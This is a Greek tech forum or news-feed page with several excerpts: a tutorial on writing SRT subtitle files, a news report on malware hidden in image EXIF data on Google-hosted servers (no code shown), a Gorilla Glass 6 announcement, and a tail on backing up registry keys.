Για να κάνετε όλα τα παραπάνω θα χρειαστείτε δικαιώματα διαχειριστή. Θα πρέπει να αναφέρουμε ότι αν σκοπεύετε να δημιουργήσετε αντίγραφα ασφαλείας από πολλά κλειδιά του μητρώου, καλό θα ήταν να τα κρατήσετε οργανωμένα, κάτι που θα σας διευκολύνει πολύ μετά όταν θέλετε να κάνετε το restore.   Read more...
    • Anastasis
      Μπορώ να φτιάξω δικούς μου υπότιτλους (Subtitles); Ένα αρχείο υποτίτλων λειτουργεί σε κάθε player που το υποστηρίζει. Οι υπότιτλοι δεν είναι δύσκολο να βρεθούν για ταινίες ή τηλεοπτικές σειρές. Σε περίπτωση που αγοράσετε ένα Blu-ray ή ένα DVD, συνήθως περιέχει και τους υπότιτλους. Αν όμως δημιουργείτε δικά σας βίντεο, μπορεί να χρειαστεί να δημιουργήσετε τους δικούς σας.
        Παρακάτω θα δούμε πως μπορείτε να το κάνετε.
      Για να δημιουργήσετε τα δικά σας Subtitles, πρέπει πρώτα να έχετε το περιεχόμενο του βίντεο που θέλετε να τα προσθέσετε. Δείτε το βίντεο και κρατήστε σημειώσεις για τους υπότιτλους που θέλετε να προσθέσετε, ή απλά χρησιμοποιήστε κάποιο λογισμικό. Εάν δεν μπορείτε να βρείτε κάποιο λογισμικό δωρεάν, μπορείτε να χρησιμοποιήσετε τη λειτουργία υπαγόρευσης στο τηλέφωνό σας. Τόσο το iOS όσο και το Android διαθέτουν εξαιρετικές λειτουργίες υπαγόρευσης. Μόλις έχετε το κείμενο που σας ενδιαφέρει να προσθέσετε, θα χρειαστείτε μια εφαρμογή για να δημιουργήσετε τους υπότιτλους. Μια απλή, δωρεάν επιλογή είναι κάποιος επεξεργαστής κειμένου όπως το Notepad. Συνιστούμε την open source εφαρμογή Notepad++
      Ανοίξτε το σημειωματάριο. Γενικά:
      Θα πρέπει να καθορίσετε το χρώμα του κειμένου στην οθόνη.
      Κάθε γραμμή που θα προσθέτετε στα Subtitles που δημιουργείτε θα πρέπει να περιέχει δύο πράγματα, τον αριθμό σειράς και το πόσο θα πρέπει να παραμένει ορατή στην οθόνη.
      Μπορείτε, επίσης, να χρησιμοποιήσετε (προαιρετικά) HTML tags όπως τα και για να γράψετε κείμενο με italics.   Στο παρακάτω παράδειγμα, το ‘1’ είναι η σειρά. Είναι η πρώτη γραμμή που θα εμφανιστεί όταν αρχίσουν να εμφανίζονται οι υπότιτλοι. 1 00:00:26,484 --> 00:00:27,360 Έτσι μπράβο. Ο χρόνος εμφανίζεται στην επόμενη γραμμή, δηλαδή οι αριθμοί. 00:00:26,484 –> 00:00:27,360. Οι αριθμοί αποφασίζουν πότε θα εμφανιστεί η γραμμή 1 και πότε θα εξαφανιστεί.
      Η σύνταξη των υποτίτλων είναι.
      [Αριθμός Σειράς][Χρόνος εμφάνισης του υπότιτλου]->[Χρόνος που εξαφανίζεται ο υπότιτλος] [Υπότιτλος] Πως γράφουμε τους αριθμούς που εμφανίζονται στον χρόνο. Για την σύνταξη της ώρας χρησιμοποιήστε την παρακάτω φόρμα: [ώρες]:[λεπτά]:[δευτερόλεπτα],[χιλιοστά του δευτερολέπτου] Παράδειγμα:   30 00:05:14,647 --> 00:05:15,481 Αυτό ήταv. Ακολουθήστε την διαδικασία για να περάσετε όλο το κείμενο. Αν θέλετε να προσθέσετε χρώμα στο κείμενο χρησιμοποιήστε HTML tags. Για παράδειγμα ο παραπάνω υπότιτλος μπορεί να γίνει:
      Επιλέξτε το χρώμα που σας ενδιαφέρει από εδώ.   Αν θέλετε να προσθέσετε πλάγια γραφή στο κείμενο χρησιμοποιήστε και πάλι HTML tags. Για παράδειγμα ο παραπάνω υπότιτλος μπορεί να γίνει: Μαζί χρώμα με πλάγια γραφή: Περισσότερα HTML tags Μόλις τελειώσετε με τους υπότιτλους μπορείτε να αποθηκεύσετε το αρχείο με την επέκταση SRT. Και πάλι, μπορείτε να το κάνετε αυτό με οποιοδήποτε πρόγραμμα επεξεργασίας κειμένου. Το Notepad++ περιέχει επιλογή αποθήκευσης σαν .srt.   https://iguru.gr/2018/07/19/subtitles-creation/  
    • Anastasis
      Στο παρελθόν, οι ερευνητές ασφαλείας αντιμετώπισαν περιπτώσεις όπου περιβόητοι χάκερς ήταν σε θέση να χρησιμοποιήσουν τα δεδομένα EXIF των εικόνων για να κρύψουν κακόβουλο κώδικα. Αυτή η τεχνική εξακολουθεί να χρησιμοποιείται ευρέως για να μολύνει τους χρήστες web με malware. Προχωρώντας ένα βήμα παραπέρα, διαπιστώθηκε ότι οι χάκερς έχουν βρει έναν τρόπο να μοιράζονται κακόβουλα προγράμματα μέσω αξιόπιστων servers της Google, όπως αυτά του googleusercontent. Σε αντίθεση με το κακόβουλο λογισμικό που είναι αποθηκευμένο σε αρχεία κειμένου, είναι πολύ πιο δύσκολο να εντοπιστούν κακόβουλα payloads σε εικόνες. Επιπλέον, είναι ακόμη πιο δύσκολο να γίνει αναφορά του malware που βρίσκεται στο googleusercontent.com στη Google.   Για όσους δεν το γνωρίζουν, το googleusercontent είναι ο τομέας της Google για την προβολή περιεχομένου που παρέχεται από τον χρήστη, χωρίς να επηρεάζεται η ασφάλεια των σελίδων της Google. Σύμφωνα με μια αναφορά του Sucuri, ο ακόλουθος κώδικας εντοπίστηκε σε ένα script που εξάγει τον κωδικό ασφαλείας PayPal:   Το script διαβάζει τα δεδομένα EXIF από μια εικόνα του googleusercontent, η οποία κατά πάσα πιθανότητα μεταφορτώθηκε από κάποιον σε λογαριασμό Google+ ή Blogger. Όταν η ενότητα UserComment των δεδομένων EXIF αποκωδικοποιήθηκε, αποδείχθηκε ότι είναι ένα script που έχει τη δυνατότητα να ανεβάσει web shell και αυθαίρετα αρχεία. Αυτό υποδεικνύει μια μεγαλύτερη απειλή, καθώς δεν υπάρχει κανένας τρόπος να εντοπιστεί το malware μέχρι να ελεγχθούν τα μεταδεδομένα των εικόνων και να αποκωδικοποιηθούν. Ακόμη και μετά την επισήμανση του κακόβουλου λογισμικού, δεν μπορεί κανείς να γνωρίζει την πραγματική πηγή της εικόνας.   Read more...  
    • Anastasis
      Τα smartphones, παρόλο που μας προσφέρουν πολλά, είναι πολύ ευαίσθητα και η καθημερινή χρήση τους μπορεί εύκολα να οδηγήσει σε μια ραγισμένη οθόνη. Μια έρευνα που διεξήχθη από την Motorola κατέληξε στο συμπέρασμα ότι τουλάχιστον το 50% των χρηστών smartphone έχουν βρεθεί με ραγισμένη οθόνη στο κινητό τους, έστω μία φορά στη ζωή τους. Όμως τώρα ίσως υπάρχει μια λύση για αυτό! Το πρόσφατα ανακοινωθέν Corning Gorilla Glass 6, υπόσχεται να μειώσει δραματικά τον κίνδυνο ραγίσματος ή θρυμματισμού της οθόνης σας. Σε ένα σημαντικό event, η Corning διαβεβαίωσε ότι το νέο Gorilla Glass 6 θα μπορούσε να επιβιώσει από έως και 15 διαδοχικές πτώσεις από ύψος 1 m ή λιγότερο. Σύμφωνα με την εταιρεία, το Corning Gorilla Glass 6 είναι “δύο φορές καλύτερο από το Gorilla Glass 5” και αποκαλείται ως “το πιο σκληρό γυαλί κάλυψης που διατίθεται για συσκευές κινητών τηλεφώνων”. Σχεδόν όλες οι flagship συσκευές, συμπεριλαμβανομένων των iPhone και Samsung μεσαίας και υψηλής απόδοσης, χρησιμοποιούν το Corning Gorilla Glass. Αλλά κάθε φορά, αυτές οι εταιρείες αποτυγχάνουν να δώσουν μια ελπιδοφόρα οθόνη για τις υψηλές τιμές τους. Κι αν δεν ραγίσει, η πρώτη πτώση από την τσέπη σίγουρα αποδυναμώνει την οθόνη με ορατές γρατσουνιές πάνω της. Ωστόσο, η Corning πιστεύει ότι το νέο προϊόν δεν θα παρουσιάσει καμία ρωγμή ούτε μετά από επαναλαμβανόμενες πτώσεις.   Θα ήταν ενδιαφέρον να δούμε πώς το νέο Gorilla Glass θα λειτουργήσει στα bezel-less τηλέφωνα. Γιατί σε αυτή την περίπτωση, η σύγκρουση γίνεται πρώτα με το γυαλί σε μια οθόνη edge to edge, σε αντίθεση με το παρελθόν όπου το πλαίσιο ήταν το πρώτο που ερχόταν σε επαφή με το έδαφος. Όσον αφορά την αντοχή στις γρατσουνιές, η εταιρεία είπε ότι το γυαλί θα προσφέρει την ίδια αντοχή σε γρατζουνιές όπως το προηγούμενο Gorilla Glass 5, αλλά θα είχε καλύτερη απόδοση.   Read more...
×